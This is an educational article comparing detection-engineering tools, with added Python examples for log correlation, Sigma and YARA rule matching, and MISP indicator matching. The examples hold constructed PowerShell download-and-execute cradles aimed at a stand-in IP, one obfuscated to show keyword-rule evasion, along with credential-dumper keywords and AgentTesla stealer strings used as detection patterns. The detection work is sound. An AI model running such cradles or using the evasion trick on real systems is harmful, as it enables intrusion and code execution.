Detection engineering focuses on creating, testing, and optimizing detection rules to identify threats and suspicious activities in an organization’s network or systems.
Here are some key tools used in detection engineering.
1. SIEM (Security Information and Event Management)
SIEM (Security Information and Event Management) tools are software platforms that collect, analyze, and correlate security data from various sources across an organization’s network, such as logs, events, and alerts. They provide real-time monitoring, threat detection, incident response capabilities, and help organizations meet compliance requirements by offering insights into potential security risks and vulnerabilities. SIEM tools integrate with other security systems to centralize security management and streamline threat hunting and investigation processes.
Comparison of Splunk, Elastic Security (built on the Elastic Stack, formerly ELK) & Microsoft Sentinel (formerly Azure Sentinel)
| Feature | Splunk | Elastic Security (ELK) | Microsoft Sentinel |
|---|---|---|---|
| Data Ingestion | Ingests structured, semi-structured, and unstructured data from logs, metrics, events, and alerts.* | Ingests data from logs, metrics, cloud sources, and network devices, typically shipped by Beats, Elastic Agent, or Logstash. | Ingests data from Azure services, on-premises systems, and third-party apps through data connectors, with the deepest coverage inside the Microsoft ecosystem (Entra ID, formerly Azure AD; Office 365; Defender; etc.). |
| Query Language | Search Processing Language (SPL) is highly versatile and supports advanced search operations such as filtering, correlation, aggregation, and pattern recognition. | Querying is performed with Kibana Query Language (KQL) and Lucene syntax for searches, and EQL for sequence-based detection rules; flexible for both simple and advanced searches. | Kusto Query Language (also abbreviated KQL, but unrelated to Kibana's) is powerful yet easy to learn, offering filtering, sorting, joins, and correlation across tables. |
| Dashboards & Visualizations | Provides a variety of visualization options such as graphs, charts, tables, and maps for real-time data insights. | Kibana provides a user-friendly interface for querying and visualizing data stored in Elasticsearch. | Workbooks let users build dashboards that show trends in security data such as login attempts, network traffic, and endpoint activity. |
| SIEM Capabilities | SIEM (SOAR is available as the separate Splunk SOAR product) | SIEM & EDR (endpoint protection via the Elastic Defend agent) | SIEM & SOAR (playbooks built on Azure Logic Apps) |
| Machine Learning | Offers built-in machine learning capabilities for anomaly detection, predictive analytics, and risk scoring. Provides a Machine Learning Toolkit for advanced data modeling and pattern detection. | Provides machine learning features for anomaly detection, including outlier detection, forecasting, and behavior analytics. | The Fusion correlation engine combines low-fidelity alerts into multi-stage incidents, and UEBA scores anomalous user and entity behaviour. |
| Alerts & Automated Response | Real-time alerting based on predefined thresholds or anomaly detection. Automated actions in response to alerts, such as invoking scripts or workflows. | Ships with prebuilt detection rules, including behavioral analytics, for real-time threat detection. Provides automated alerting and response actions based on those rules. | Provides automated threat detection, investigation, and response***** using built-in analytics rules and ML-based detections. Leverages Microsoft's threat intelligence, enabling enhanced detection and faster response times. |
| Integration & Extensibility | Detections mapped to MITRE ATT&CK. REST API and SDKs for Python, Java, and JavaScript. Third-party integrations with pre-built apps for services such as AWS, Microsoft Azure, Salesforce, and more.** | Open-source core with a large ecosystem of plugins and integrations.**** | Integrates natively with other Microsoft security products such as Defender, Entra ID, Office 365, and Intune, making it powerful for organizations already within the Azure ecosystem. Supports third-party data ingestion through APIs and connectors, including security products from Palo Alto, Cisco, and AWS. |
| Scalability | Horizontally and vertically scalable***, supporting both on-premises and cloud environments. Splunk Cloud offers a fully managed version of the platform. | Designed for distributed and horizontally scalable deployments. Offers Elastic Cloud, a fully managed cloud service. | Cloud-native SaaS running on Azure infrastructure; the platform scales automatically with the organization's ingestion volume. |
* Structured data is well-organized, easily parsed data (e.g., database rows, predefined log formats) that fits directly into a SIEM's correlation and search functions. Semi-structured data (e.g., syslog, JSON, XML) has identifiable patterns or keys that allow field extraction but no fixed schema. Unstructured data (e.g., free-text logs, PCAP payloads) has no predefined schema at all and needs parsing or field extraction before it can be searched and correlated effectively.
** https://splunkbase.splunk.com/
*** Supporting both horizontal scaling (adding more servers) and vertical scaling (adding resources to existing servers) to handle massive amounts of data.
**** https://www.elastic.co/integrations/data-integrations
***** Offers SOAR capabilities, allowing for automated incident response workflows using Playbooks, which are built on Azure Logic Apps. Enables automatic responses to security incidents, such as isolating compromised endpoints or blocking malicious IPs.
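The table above lists ingestion and correlation as core SIEM functions without showing what they look like in practice. The following added example (written for this page, not taken from any of the products compared) normalises two constructed log formats, an sshd syslog line and a JSON auth event, into one event schema and runs a classic correlation rule over them: several failed logons from one source followed by a success for the same user inside a short window. All hostnames, users, addresses and timestamps are made up; real SIEMs do this with their own parsers and rule languages, so the code only illustrates the logic.

```python
"""Added example: multi-source normalisation plus a brute-force-then-success correlation rule.
Sample log lines are constructed for this example; hosts, users and IPs are fictitious."""
import json
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed semi-structured input 1: RFC 3164-style syslog lines from an SSH server.
SYSLOG_LINES = [
    "<38>Mar  4 10:00:01 bastion sshd[2211]: Failed password for alice from 203.0.113.7 port 50122 ssh2",
    "<38>Mar  4 10:00:05 bastion sshd[2211]: Failed password for alice from 203.0.113.7 port 50123 ssh2",
    "<38>Mar  4 10:00:09 bastion sshd[2211]: Failed password for alice from 203.0.113.7 port 50124 ssh2",
    "<38>Mar  4 10:00:40 bastion sshd[2214]: Accepted password for alice from 203.0.113.7 port 50130 ssh2",
]
# Constructed semi-structured input 2: JSON events from a web application's login endpoint.
JSON_LINES = [
    '{"ts": "2024-03-04T10:01:00Z", "user": "bob", "src": "198.51.100.9", "result": "fail"}',
    '{"ts": "2024-03-04T10:01:03Z", "user": "bob", "src": "198.51.100.9", "result": "fail"}',
    '{"ts": "2024-03-04T10:05:00Z", "user": "bob", "src": "198.51.100.9", "result": "success"}',
]

SYSLOG_RE = re.compile(
    r"^<\d+>(?P<mon>\w{3})\s+(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?P<user>\S+) from (?P<src>\S+) port"
)
MONTHS = {m: i for i, m in enumerate(
    ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"], start=1)}


def parse_syslog(line, year=2024):
    """Normalise an sshd syslog line into the common schema.
    RFC 3164 timestamps carry no year, so one is assumed (a real pipeline takes it from the collector)."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime(year, MONTHS[m["mon"]], int(m["day"]),
                  *map(int, m["time"].split(":")), tzinfo=timezone.utc)
    return {"ts": ts, "user": m["user"], "src": m["src"],
            "outcome": "success" if m["outcome"] == "Accepted" else "failure"}


def parse_json_event(line):
    """Normalise a JSON auth event into the same schema as parse_syslog."""
    d = json.loads(line)
    ts = datetime.fromisoformat(d["ts"].replace("Z", "+00:00"))
    return {"ts": ts, "user": d["user"], "src": d["src"],
            "outcome": "success" if d["result"] == "success" else "failure"}


def correlate(events, min_failures=3, window_seconds=60):
    """Stateful rule: for each (src, user) pair, a success preceded by at least
    min_failures failures within window_seconds produces one alert."""
    alerts = []
    failures = defaultdict(list)  # (src, user) -> timestamps of failures seen so far
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["src"], ev["user"])
        if ev["outcome"] == "failure":
            failures[key].append(ev["ts"])
            continue
        recent = [t for t in failures[key] if (ev["ts"] - t).total_seconds() <= window_seconds]
        if len(recent) >= min_failures:
            alerts.append({"src": ev["src"], "user": ev["user"],
                           "failures": len(recent), "success_at": ev["ts"].isoformat()})
        failures[key].clear()  # a success resets the counter for that pair
    return alerts


def run():
    """Parse both constructed sources and return the alerts the rule produces."""
    events = [e for e in map(parse_syslog, SYSLOG_LINES) if e]
    events += [parse_json_event(line) for line in JSON_LINES]
    return correlate(events)


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

Only alice's session fires: three failures and a success from 203.0.113.7 within 39 seconds. bob's two failures fall short of the threshold, and his success arrives four minutes later anyway, which is the kind of tuning decision (threshold and window) that separates a noisy rule from a useful one.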
2. Detection Rule Management Tools
Detection rule management tools are software platforms used to create, modify, and manage rules that identify suspicious activities or threats within a network or system. These tools allow security teams to define specific conditions (rules) for detecting potential security incidents, automate responses, and fine-tune detection accuracy. They are crucial in SIEMs, IDS/IPS, and EDR systems to ensure timely and accurate identification of threats, reducing false positives and improving incident response efficiency.
Sigma & YARA
| Features | Sigma | YARA |
|---|---|---|
| Purpose | A generic, vendor-neutral signature format for log events. Rules are written once in YAML and converted into backend-specific queries (Splunk SPL, Kusto, Elasticsearch, and others) with converters such as sigma-cli/pySigma. | Focused on malware identification. A rule declares byte and text patterns (with modifiers such as wide, nocase, and hex strings) plus a boolean condition, and is used to identify and classify samples in files, binaries, or memory. |
| Use Case | Threat hunting and SOC detection rules: spotting patterns of behaviour in logs across heterogeneous infrastructures. | Malware analysis, triage, and digital forensics: classifying samples by family and hunting for them across large collections. |
| Integration | SIEM and log analytics platforms, via the converted queries | VirusTotal (Livehunt/Retrohunt), sandboxes and automated malware analysis pipelines, and EDR/antivirus scanners |
| Flexibility | Highly flexible due to its platform-agnostic nature: one rule targets multiple SIEM backends with minimal changes, provided the backend has a field mapping for the rule's log source. | Narrower in scope but extremely effective in its niche. It matches content rather than behaviour, so packed or encrypted samples are invisible to it until they are unpacked on disk or in memory. |
Syntax Comparison
Both formats work on the same principle: a rule declares the strings or keywords of interest and a condition that states how they must combine for the rule to fire. The difference is the haystack. Sigma matches against the fields of log events, YARA against the raw bytes of a file or memory region.
```yaml
title: Suspicious PowerShell Command
logsource:
  product: windows
  service: powershell
detection:
  keywords:
    - 'Invoke-Mimikatz'
    - 'New-Object Net.WebClient'
  condition: keywords
```
This Sigma rule fires when either keyword appears anywhere in a Windows PowerShell log event (for example in the ScriptBlockText of Event ID 4104). "Invoke-Mimikatz" is the PowerShell port of the Mimikatz credential dumper; "New-Object Net.WebClient" is the classic download cradle used to fetch and execute remote code from within a PowerShell session. Keyword rules are cheap to write but easy to evade with string concatenation, encoding, or aliases, so they are a starting point rather than a finished detection.
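To make the matching semantics concrete, here is an added example (written for this page, not code from the original or from the Sigma project) that applies the rule's keyword list to a handful of constructed PowerShell script-block events. The events are modelled on Event ID 4104 but are invented, and the rule is embedded as the Python dict a YAML loader would produce so the example needs no third-party library. The last event shows the evasion caveat: the same download cradle, assembled by string concatenation, no longer contains the keyword.

```python
"""Added example: evaluate a Sigma keyword-list detection against constructed
PowerShell script-block events. Not part of the original page or the Sigma project."""

# The page's rule, as the dict a YAML loader would produce (no pyyaml dependency).
SIGMA_RULE = {
    "title": "Suspicious PowerShell Command",
    "logsource": {"product": "windows", "service": "powershell"},
    "detection": {
        "keywords": ["Invoke-Mimikatz", "New-Object Net.WebClient"],
        "condition": "keywords",
    },
}

# Constructed events modelled on Windows Event ID 4104 (ScriptBlockText). Not real logs.
EVENTS = [
    {"EventID": 4104,
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
    {"EventID": 4104,
     "ScriptBlockText": "Import-Module .\\x.ps1; invoke-mimikatz -DumpCreds"},
    {"EventID": 4104,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"},
    # Same download cradle, assembled at runtime: plain keyword matching no longer sees it.
    {"EventID": 4104,
     "ScriptBlockText": "$c = 'Net.Web' + 'Client'; IEX (New-Object $c).DownloadString('http://203.0.113.5/b.ps1')"},
]


def event_text(event):
    """Sigma keyword searches are not bound to a field, so the whole event is the haystack."""
    return " ".join(str(v) for v in event.values())


def evaluate_keywords(rule, event):
    """Return the keywords that hit. Common Sigma backends treat keyword lists as
    case-insensitive substring matches; with the bare condition 'keywords', any
    single hit makes the rule fire."""
    detection = rule["detection"]
    if detection["condition"] != "keywords":
        raise ValueError("this minimal evaluator only handles the plain 'keywords' condition")
    haystack = event_text(event).lower()
    return [kw for kw in detection["keywords"] if kw.lower() in haystack]


def run_rule(rule, events):
    """Return (event index, matched keywords) for every event the rule fires on."""
    hits = []
    for i, ev in enumerate(events):
        matched = evaluate_keywords(rule, ev)
        if matched:
            hits.append((i, matched))
    return hits


if __name__ == "__main__":
    for idx, matched in run_rule(SIGMA_RULE, EVENTS):
        print(f"event {idx} matched {matched}: {EVENTS[idx]['ScriptBlockText']}")
```

Events 0 and 1 fire (the second only because matching is case-insensitive; the attacker typed `invoke-mimikatz`). Event 2 is benign and stays quiet. Event 3 is the miss that matters: a detection engineer would pair this rule with one on `DownloadString`, on suspicious string concatenation, or on the resulting network connection rather than trust the keyword alone.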
```yara
rule agenttesla_detector {
    meta:
        author = "psy_maestro"
        date = "18/Feb/2024"
        description = "Detects AgentTesla"
        SHA256 = "e9c028ecb36a6fb2e3a9f2ce8e58fa444649dd3c47039765cca1967dcc99ef3b"
    strings:
        $anti_analysis1 = "cmdvrt32.dll" wide
        $anti_analysis2 = "snxhk.dll" wide
        $anti_analysis3 = "SxIn.dll" wide
        $anti_analysis4 = "Sf2.dll" wide
        $anti_analysis5 = "SbieDll.dll" wide
        $stealer1 = "Login Data" wide
        $stealer2 = "logins" wide
        $stealer3 = "\\User Data" wide
        $stealer4 = "autofill" wide
    condition:
        uint16(0) == 0x5A4D and              // looks for MZ at 0x00
        uint32(uint32(0x3C)) == 0x00004550 and // PE signature at the offset stored at 0x3C
        all of them
}
```
Source: https://medium.com/@psy_maestro/agenttesla-malware-analysis-report-12400875db82
This rule was written to detect AgentTesla. It is based on a single AgentTesla sample (the SHA256 recorded in the meta section), and its hit rate was then checked against the sample collections at https://www.unpac.me/ and https://www.hybrid-analysis.com/#homepage-search-yara. The anti-analysis strings are DLL names the malware looks for to detect sandboxes (Comodo, Avast, Sandboxie and similar), and the stealer strings are paths and table names from Chromium browser credential stores. Because the condition requires all of the strings, every one of them must be present: this keeps false positives low, but a variant that drops or obfuscates even one string slips past it.
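The condition above packs three YARA idioms into two lines: little-endian integer reads at fixed and indirect offsets, the `wide` (UTF-16LE) string modifier, and the `all of them` quantifier. The following added example (written for this page; not from the original, the cited report, or the YARA project) re-implements that condition over raw bytes so each piece can be tested separately. The byte blobs are constructed here and are not executables or malware; they only have the MZ/PE markers and the strings the rule looks for.

```python
"""Added example: the AgentTesla rule's condition re-implemented in Python so the
semantics of uint16(0), uint32(uint32(0x3C)), 'wide' and 'all of them' are visible.
Sample blobs are constructed and are not real files."""
import struct

ANTI_ANALYSIS = ["cmdvrt32.dll", "snxhk.dll", "SxIn.dll", "Sf2.dll", "SbieDll.dll"]
STEALER = ["Login Data", "logins", "\\User Data", "autofill"]


def wide(s):
    """YARA's 'wide' modifier: the string encoded as UTF-16LE, two bytes per character."""
    return s.encode("utf-16-le")


def is_pe(data):
    """uint16(0) == 0x5A4D ('MZ') and uint32(uint32(0x3C)) == 0x00004550 ('PE\\0\\0').
    YARA reads these integers little-endian; a read past the end of the data is simply
    false, so the lengths are checked before unpacking."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != 0x5A4D:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 > len(data):
        return False
    return struct.unpack_from("<I", data, e_lfanew)[0] == 0x00004550


def matches_agenttesla_rule(data):
    """'all of them': every declared string must occur at least once, as UTF-16LE."""
    return is_pe(data) and all(wide(s) in data for s in ANTI_ANALYSIS + STEALER)


def build_sample(strings, pe=True):
    """Construct a minimal PE-shaped blob: a 0x40-byte DOS header whose e_lfanew field
    points at 'PE\\0\\0', followed by the given strings as NUL-separated UTF-16LE.
    Constructed for this example; it is not a runnable executable."""
    header = bytearray(0x40)
    if pe:
        header[0:2] = b"MZ"
        struct.pack_into("<I", header, 0x3C, 0x40)  # PE signature directly after the DOS header
    body = b"PE\x00\x00" + b"\x00" * 4
    for s in strings:
        body += wide(s) + b"\x00\x00"
    return bytes(header) + body


def demo():
    """Exercise the rule on one matching blob and three near-misses."""
    full = build_sample(ANTI_ANALYSIS + STEALER)
    partial = build_sample(ANTI_ANALYSIS + STEALER[:-1])  # 'autofill' missing
    ascii_only = build_sample([]) + "".join(ANTI_ANALYSIS + STEALER).encode("ascii")
    not_pe = build_sample(ANTI_ANALYSIS + STEALER, pe=False)
    return {
        "full_sample": matches_agenttesla_rule(full),
        "missing_one_string": matches_agenttesla_rule(partial),
        "ascii_not_wide": matches_agenttesla_rule(ascii_only),
        "no_pe_header": matches_agenttesla_rule(not_pe),
    }


if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name}: {'match' if hit else 'no match'}")
```

Only the complete blob matches. Dropping a single string defeats `all of them`, the ASCII variant shows why `wide` matters for .NET binaries (their string literals are UTF-16), and the blob without MZ/PE markers shows the header check short-circuiting before any string search, which is also what makes such rules cheap to run at scale.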
3. Attack Simulation and Emulation
Attack simulation and emulation tools are security platforms that mimic real-world cyberattacks to assess an organization’s defenses. These tools simulate various attack techniques, tactics, and procedures (TTPs) used by adversaries to test the effectiveness of security controls, identify vulnerabilities, and improve incident response. Unlike traditional testing methods, such as penetration testing, attack simulation tools are designed to continuously evaluate security postures in a controlled, repeatable manner, helping organizations improve resilience against real-world threats.
Atomic Red Team, Caldera & Metasploit
| Features | Atomic Red Team | Caldera | Metasploit |
|---|---|---|---|
| Purpose | Focuses on testing detection and defensive coverage by emulating individual adversary techniques from the MITRE ATT&CK framework. | An automated adversary emulation platform that chains techniques into full attack sequences driven by the MITRE ATT&CK framework. | Primarily a penetration testing framework focused on discovering vulnerabilities, exploiting them, and demonstrating access to systems during authorized engagements. |
| Attack Simulation & Exploits | Designed for tactic and technique emulation, not full exploitation; each atomic test is a small, self-contained command or script. | Simulates adversary behaviors across an entire attack chain, from initial access through persistence to exfiltration, using agents deployed on target hosts. | Exploit-driven: finds and uses vulnerabilities to gain access, then offers post-exploitation modules and payloads. |
| Integration | Directly tied to the MITRE ATT&CK framework, with each test mapped to a specific technique ID. | Also based on the MITRE ATT&CK framework, but with an emphasis on full emulation, including adversary goals and the chaining of techniques into realistic scenarios. | Not inherently mapped to the MITRE ATT&CK framework, though many modules can be mapped to TTPs manually. |
| Usage Complexity | Modular and simple to use; atomic tests run from command-line scripts (Invoke-AtomicRedTeam on Windows). | Moderate complexity, since it orchestrates full adversary simulations through a server and agents. | More complex due to the wide range of modules, exploits, and payloads. Requires a deeper understanding of penetration testing and exploitation to use effectively. |
| Community and Support | Open-source. Maintained by Red Canary, with community-contributed tests for new ATT&CK techniques. | Open-source. Developed and maintained by MITRE, with a solid user base focused on adversary emulation. | One of the largest and most active communities in the security space, with constant updates to its exploit and module database. |
4. EDR (Endpoint Detection and Response)
Endpoint Detection and Response (EDR) tools are security solutions that monitor and analyze endpoint activities in real-time to detect, investigate, and respond to cyber threats. EDR tools provide visibility into endpoints, such as laptops and servers, to identify suspicious behaviors, malware, and advanced persistent threats (APTs). They offer capabilities like threat hunting, incident response, and automated remediation, helping organizations quickly contain and mitigate attacks before they spread across the network.
CrowdStrike Falcon & Carbon Black
| Features | CrowdStrike Falcon | Carbon Black |
|---|---|---|
| Architecture | Cloud-native architecture: a lightweight sensor on the endpoint and no on-premises infrastructure to run. | Hybrid architecture: some components can be deployed on-premises, and a cloud-based option (Carbon Black Cloud) is available for scalability. |
| Methodology | Falcon combines machine learning, behavioral analysis, and threat intelligence to detect threats. Its Threat Graph analyzes telemetry in real time across all sensors in the CrowdStrike customer base, allowing detections learned from one customer to protect others. | Carbon Black uses streaming prevention and behavioral EDR for threat detection. It also uses machine learning, but places a strong emphasis on manual threat hunting and behavioral analytics over rich recorded telemetry. |
| Threat Intelligence | Falcon's threat intelligence service, Falcon X (now Falcon Intelligence), provides threat reports, automated malware analysis, and adversary attribution. | Carbon Black's threat intelligence feeds are sourced from its vendor's threat intelligence cloud (VMware Carbon Black, now part of Broadcom), which aggregates information from multiple sources. |
| Threat Hunting | Falcon OverWatch, a managed threat hunting service, leverages CrowdStrike's global telemetry to proactively hunt for threats in customer environments. | Offers strong capabilities for manual threat hunting, allowing analysts to dig into extensive endpoint telemetry to uncover stealthy attacks. |
| Performance | Known for low system resource usage: the sensor consumes minimal CPU, memory, and bandwidth because heavy analysis happens in the cloud. | The Carbon Black agent can be more resource-intensive, as it continuously records and ships detailed telemetry from the endpoint. |
| Integration | Offers a wide range of integrations through Falcon's API, including SIEM systems, SOAR platforms, and other security tools. | Supports integration with SIEMs, SOAR platforms, and other tools, with its strongest advantage in VMware environments. |
5. Threat Intelligence Platforms
Threat Intelligence Platforms are security tools designed to aggregate, analyze, and manage threat intelligence data from various sources. They help organizations identify and understand emerging threats, track indicators of compromise (IoCs), and enhance detection and response capabilities. Threat Intelligence Platforms enable the sharing of threat intelligence across teams or with external partners, improving overall security posture by integrating this intelligence into existing security tools like SIEMs and EDR systems.
MISP (Malware Information Sharing Platform) & Open Threat Exchange (OTX)
| Features | MISP | OTX |
|---|---|---|
| Purpose | MISP is an open-source threat intelligence platform designed for collaborative sharing of threat intelligence (malware indicators, threat actors, attack techniques). | OTX is a community-driven threat intelligence platform where users publish threat data as "pulses" (collections of Indicators of Compromise) and consume intelligence shared by other users. |
| Architecture | MISP is an on-premises or self-hosted solution, giving organizations full control over their threat intelligence data. | OTX is cloud-based and hosted by AlienVault / AT&T Cybersecurity (now LevelBlue), with no self-hosting option. |
| Data Sharing & Collaboration | MISP allows highly controlled and structured sharing. Users define sharing groups, set access permissions, and segment information by trust level or distribution setting. MISP facilitates sharing through communities, sectors, and CERTs. | OTX has a centralized sharing model: published pulses are visible to the whole OTX community, so sharing is far less granular than in MISP. Collaboration is more open, but with less fine-grained privacy control. |
| Formats & Standards | Native MISP JSON plus STIX 1 and 2, OpenIOC, IODEF, and CSV for import and export; TAXII is supported as a transport for exchanging STIX content. | Pulses use OTX's own JSON format with basic indicator types such as IP addresses, domain names, URLs, and file hashes; pulses can be exported in common formats such as STIX, OpenIOC, and CSV. |
| Ease of Use | MISP requires more technical expertise to set up and operate than OTX. It is a powerful platform with many configuration options, suited to organizations with dedicated security teams. | OTX is designed to be simple and easy to use, even for users without advanced technical skills. Its clean UI lets users quickly browse, create, and consume threat intelligence. |
| Community | MISP has a strong focus on trusted communities, where organizations collaborate and exchange threat intelligence in closed groups or sectors (e.g., ISACs, national CERTs). | OTX is an open community with contributions from a wide range of users, from individual researchers to large organizations. Openness comes at the cost of trust: shared data is available to the entire user base, and there is less control over quality and reliability, so indicators should be vetted before they drive blocking. |
| Integration | MISP offers strong integration capabilities, with a REST API (PyMISP), feeds, and modules for SIEMs, firewalls, IDS/IPS, and other security tools. | OTX provides an API (with an official Python SDK) that lets users pull IoCs from pulses into their SIEMs or security tools. |
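The table mentions integrating platform indicators into SIEMs and security tools without showing the two steps that actually cause trouble in practice: selecting only the indicators meant for detection and normalising them so they compare against real log values. The following added example (written for this page; not code from MISP, OTX, or the original article) loads a constructed event shaped like MISP's JSON export (`{"Event": {"Attribute": [...]}}` with `type`, `value`, and `to_ids` per attribute), keeps only `to_ids=True` attributes, refangs and lowercases them, and matches them against constructed proxy log lines. All indicator values, addresses, domains, and the hash are invented.

```python
"""Added example: extract detection-grade IoCs from a MISP-style event and match them
against proxy logs. Event content, log lines, domains, IPs and the hash are constructed."""
import json
import re

FAKE_SHA256 = "ab" * 32  # placeholder hash, not a real sample

# Constructed event following the shape of MISP's event JSON. to_ids=False marks
# context (or an indicator judged too noisy to alert on), not something to match.
MISP_EVENT = json.loads('''{
  "Event": {
    "info": "Constructed example event",
    "Attribute": [
      {"type": "ip-dst",  "value": "203.0.113.42",                            "to_ids": true},
      {"type": "domain",  "value": "Update-Check.Example.NET",                "to_ids": true},
      {"type": "url",     "value": "hxxp://cdn.example[.]org/payload.bin",    "to_ids": true},
      {"type": "sha256",  "value": "%s", "to_ids": true},
      {"type": "ip-dst",  "value": "198.51.100.1",                            "to_ids": false},
      {"type": "comment", "value": "seen in phishing wave",                   "to_ids": false}
    ]
  }
}''' % FAKE_SHA256)

# Constructed proxy log lines: timestamp, client, method, destination URL, hash of the fetched body.
PROXY_LOGS = [
    "2024-03-04T10:00:00Z 10.0.0.5 GET http://update-check.example.net/ping sha256=aaaa",
    "2024-03-04T10:00:02Z 10.0.0.5 GET http://cdn.example.org/payload.bin sha256=" + FAKE_SHA256,
    "2024-03-04T10:00:05Z 10.0.0.9 GET http://198.51.100.1/status sha256=bbbb",
    "2024-03-04T10:00:07Z 10.0.0.9 GET http://203.0.113.42:8080/c2 sha256=cccc",
    "2024-03-04T10:00:09Z 10.0.0.7 GET http://intranet.example.com/ sha256=dddd",
]

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) sha256=(?P<sha256>\S+)$")
HOST_RE = re.compile(r"^[a-z]+://([^/:]+)")


def refang(value):
    """Undo the defanging analysts apply when sharing (hxxp, [.]) so values compare against logs."""
    return (value.replace("hxxps://", "https://").replace("hxxp://", "http://")
                 .replace("[.]", ".").replace("[:]", ":"))


def load_indicators(event):
    """Keep only attributes flagged to_ids=True, normalised (refanged, lowercased), grouped by type."""
    by_type = {}
    for attr in event["Event"]["Attribute"]:
        if not attr.get("to_ids"):
            continue
        by_type.setdefault(attr["type"], set()).add(refang(attr["value"]).lower())
    return by_type


def match_logs(indicators, lines):
    """Return one hit per log line that touches any indicator, with every reason it matched."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m["url"].lower()
        hm = HOST_RE.match(url)
        host = hm.group(1) if hm else ""  # scheme, port and path stripped
        reasons = []
        if host in indicators.get("ip-dst", ()):
            reasons.append(("ip-dst", host))
        if host in indicators.get("domain", ()):
            reasons.append(("domain", host))
        if url in indicators.get("url", ()):
            reasons.append(("url", url))
        if m["sha256"] in indicators.get("sha256", ()):
            reasons.append(("sha256", m["sha256"]))
        if reasons:
            hits.append({"ts": m["ts"], "client": m["client"], "matched": reasons})
    return hits


def run():
    """Load the constructed event and match it against the constructed proxy logs."""
    return match_logs(load_indicators(MISP_EVENT), PROXY_LOGS)


if __name__ == "__main__":
    for hit in run():
        print(hit)
```

Three lines hit: the mixed-case domain (normalisation), the payload URL plus its hash (two reasons on one line), and the C2 address behind a non-standard port (host extraction). The request to 198.51.100.1 is deliberately silent because that attribute carries `to_ids=False`; ignoring that flag is the most common way a MISP integration turns into an alert flood.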
